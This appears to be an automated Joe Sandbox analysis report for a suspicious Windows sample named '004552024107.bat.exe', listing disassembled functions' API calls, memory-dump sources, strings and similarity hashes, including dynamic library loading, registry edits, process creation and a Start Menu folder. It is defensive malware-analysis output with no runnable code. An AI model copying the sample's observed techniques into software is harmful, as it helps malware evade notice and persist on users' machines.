                                        control_flow_graph 837 405e4f-405e59 838 405e5a-405e85 GetTickCount GetTempFileNameA 837->838 839 405e94-405e96 838->839 840 405e87-405e89 838->840 842 405e8e-405e91 839->842 840->838 841 405e8b 840->841 841->842
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00405E63
                                        • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008), ref: 00405E7D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CountFileNameTempTick
                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                        • API String ID: 1716503409-944333549
                                        • Opcode ID: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction ID: 3970c65dfeb72379d163dc795dbdbe3f0392b49dfad0d6f3c406a96719355742
                                        • Opcode Fuzzy Hash: 785ee4e59b25deabe338fa9c65985dff7b7c4930a860df7800de2eab11a71ed7
                                        • Instruction Fuzzy Hash: A0F082363042046BDB109F56EC04B9B7B9CEF91750F10803BF9889B180D6B099558798
                                        APIs
                                        • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 004020F5
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,00000000,00424440,757B23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402105
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                        • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040217F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2987980305-0
                                        • Opcode ID: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                        • Instruction ID: 18bbb9f6491bb16bc869df63e9f5beea4603ad23440c914569cabcc4b16c920a
                                        • Opcode Fuzzy Hash: 056f6e09274932c5806e516a526782628814fdef0fe3ef9b51a109e535a48abd
                                        • Instruction Fuzzy Hash: ED21C931A00115BBCF20BF659F89B6F7570AB40358F20413BF611B61D1CABD49839A5E
                                        APIs
                                          • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,0000000C,00405D24,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,757B3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe"), ref: 00405CC6
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                          • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                                          • Part of subcall function 00405897: CreateDirectoryA.KERNELBASE(00431400,?), ref: 004058D9
                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Storfyrstindes,00000000,00000000,000000F0), ref: 00401661
                                        Strings
                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Storfyrstindes, xrefs: 00401656
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes\Storfyrstindes
                                        • API String ID: 1892508949-1191349742
                                        • Opcode ID: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                        • Instruction ID: 0b6d2b43488905cbaa276f6c0cac56371e043703d2fe031d841b632f48d4a949
                                        • Opcode Fuzzy Hash: 2c20d4c644fd78e3d1f4ce17685fc2594679ef97166e32e1fcd970dca5652f26
                                        • Instruction Fuzzy Hash: 3911E331904240AFDF307F754D41A7F26B0DA56724B68497FF891B22E2C63D49439A6E
                                        APIs
                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000000,?,?,00406432,80000002), ref: 004061BA
                                        • RegCloseKey.KERNELBASE(?,?,00406432,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsr10C0.tmp\System.dll), ref: 004061C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: Call
                                        • API String ID: 3356406503-1824292864
                                        • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                        • Instruction ID: 11b83480b68dea0a629fd90b3ddfe96452127a043c469d5d543a73811e09722f
                                        • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                        • Instruction Fuzzy Hash: 9A01D472500209ABCF22CF10CD05FDB3FA8EF54354F01403AF915A6191D774CA64CB94
                                        APIs
                                        • GlobalFree.KERNEL32(007FC7A0), ref: 00401C1B
                                        • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401C2D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID: Call
                                        • API String ID: 3394109436-1824292864
                                        • Opcode ID: 0514f784d2a2b378cc714ce1c47b00427531ebb3eb621da23fd343847ac9c6fe
                                        • Instruction ID: 9dc913a82bccb3a17233260e0918e107c000b9093c8e114c97909187c283bf28
                                        • Opcode Fuzzy Hash: 0514f784d2a2b378cc714ce1c47b00427531ebb3eb621da23fd343847ac9c6fe
                                        • Instruction Fuzzy Hash: 292181B2600105EBDB50BFA58E84E5E72E8EB44318711453BF902F32D1DBBCE8169B9D
                                        APIs
                                          • Part of subcall function 00406620: FindFirstFileA.KERNELBASE(757B3410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,757B3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,757B3410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                          • Part of subcall function 00406620: FindClose.KERNEL32(00000000), ref: 00406637
                                        • lstrlenA.KERNEL32 ref: 00402358
                                        • lstrlenA.KERNEL32(00000000), ref: 00402362
                                        • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 0040238A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                        • String ID:
                                        • API String ID: 1486964399-0
                                        • Opcode ID: 291976f7d3112056eb6b717bd47d13cf5f6b9c3e892707c150601705bf3dcc2a
                                        • Instruction ID: 014db6f64816cec2a1970dfcbbf9fa03b0cf1b46d42cec59bb2956c4bbb3b767
                                        • Opcode Fuzzy Hash: 291976f7d3112056eb6b717bd47d13cf5f6b9c3e892707c150601705bf3dcc2a
                                        • Instruction Fuzzy Hash: 35117071E04209ABDB10EFF58A45A9EB7F8AF00314F10407BA501F72C2D6FDC5428B59
                                        APIs
                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                                        • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00000000,00000011,00000002), ref: 00402612
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Enum$CloseValue
                                        • String ID:
                                        • API String ID: 397863658-0
                                        • Opcode ID: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                        • Instruction ID: cba12c4e2b45f70554d055d57f05f50eb42167a32c5ceb359e12f1818167ad50
                                        • Opcode Fuzzy Hash: 4c7cffd82a1a6ff72a98075f8b8725b621981bbded826c54beb525449930f380
                                        • Instruction Fuzzy Hash: 4E01BC71604204AFEB218F54DE98ABF7AACEB40348F10443FF005A61C0DAB84A459A29
                                        APIs
                                        • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402573
                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr10C0.tmp,00000000,00000011,00000002), ref: 00402612
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID:
                                        • API String ID: 3356406503-0
                                        • Opcode ID: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                        • Instruction ID: 97fa2cc47e124225833d1b044c3f4c0ff185fe65e0aec06a9837656ed07e9740
                                        • Opcode Fuzzy Hash: dcdcdbe78ff3a909b69e1bc964059ef71c3d22f6032091b40b69186da43a403e
                                        • Instruction Fuzzy Hash: 6511C171905205EFDF20CF60CA985AE7AB4EF01344F20883FE446B72C0D6B88A45DA1A
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                        • Instruction ID: 80ce8cba2e1b90c3c9584b4bf9ae45de9eb83361fcac52349235150bfd3c5ac5
                                        • Opcode Fuzzy Hash: a4ad1f289275d07b12332ff40cf82794c587183748ad10ec12a076e6d131a720
                                        • Instruction Fuzzy Hash: C801F4317242209BE7295B399D08B6A36D8E710754F50823FF995F71F1E678CC028B5C
                                        APIs
                                        • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402478
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CloseDeleteValue
                                        • String ID:
                                        • API String ID: 2831762973-0
                                        • Opcode ID: 367c10f48611654ec83905158c0e7abb7b05128d9b12c6fa4614681cb29fe441
                                        • Instruction ID: 01f6084b7650a9b213f52d22935e9030d34abb49b24569214b94c05b06999087
                                        • Opcode Fuzzy Hash: 367c10f48611654ec83905158c0e7abb7b05128d9b12c6fa4614681cb29fe441
                                        • Instruction Fuzzy Hash: D3F0B132604121AFDB60EBA49F4DA7F72A99B40314F15003FF101B71C1D9F84D42466E
                                        APIs
                                        • CreateDirectoryA.KERNELBASE(00431400,?), ref: 004058D9
                                        • GetLastError.KERNEL32 ref: 004058E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                        • Instruction ID: 6d4ac730157cfa02be50de44a6d7979ff339f577f95dd1204a0ac4d64297c34f
                                        • Opcode Fuzzy Hash: 3953c50c5734a5342b3d9bd696b660d903f899823d07f085df3ad9df62cd1170
                                        • Instruction Fuzzy Hash: A3F0F971C0024DDADB00DFA4D5487DEBBB4AF04305F00802AD841B6280D7B882588B99
                                        APIs
                                        • ShowWindow.USER32(00000000,00000000), ref: 00401F08
                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Window$EnableShow
                                        • String ID:
                                        • API String ID: 1136574915-0
                                        • Opcode ID: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                        • Instruction ID: ee44cb40e53ee45f72a0237e1ac7dd9bbdf9d48109a1395b289766a98c9c438f
                                        • Opcode Fuzzy Hash: c55ef19b1d155cac422469f2929527eb9f7a60a7667ba4af7f0f003dd8d3c6d7
                                        • Instruction Fuzzy Hash: C9E04872A082049FEF64EBA4FE9556F77F4EB50365B20447FE101F11C2DA7849428A5D
                                        APIs
                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042BC90,00431800,00431800,00431800,?,00431400,00000000), ref: 0040594F
                                        • CloseHandle.KERNEL32(?), ref: 0040595C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID:
                                        • API String ID: 3712363035-0
                                        • Opcode ID: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
                                        • Instruction ID: 59d3833cbd0ccaca5dcead9257bf18f7f56651039fadea8639d530792baa2c48
                                        • Opcode Fuzzy Hash: f2e48875b6aa7a4f82b92d961b6a232b94f4984d6ef5c684ccb1095c4447d295
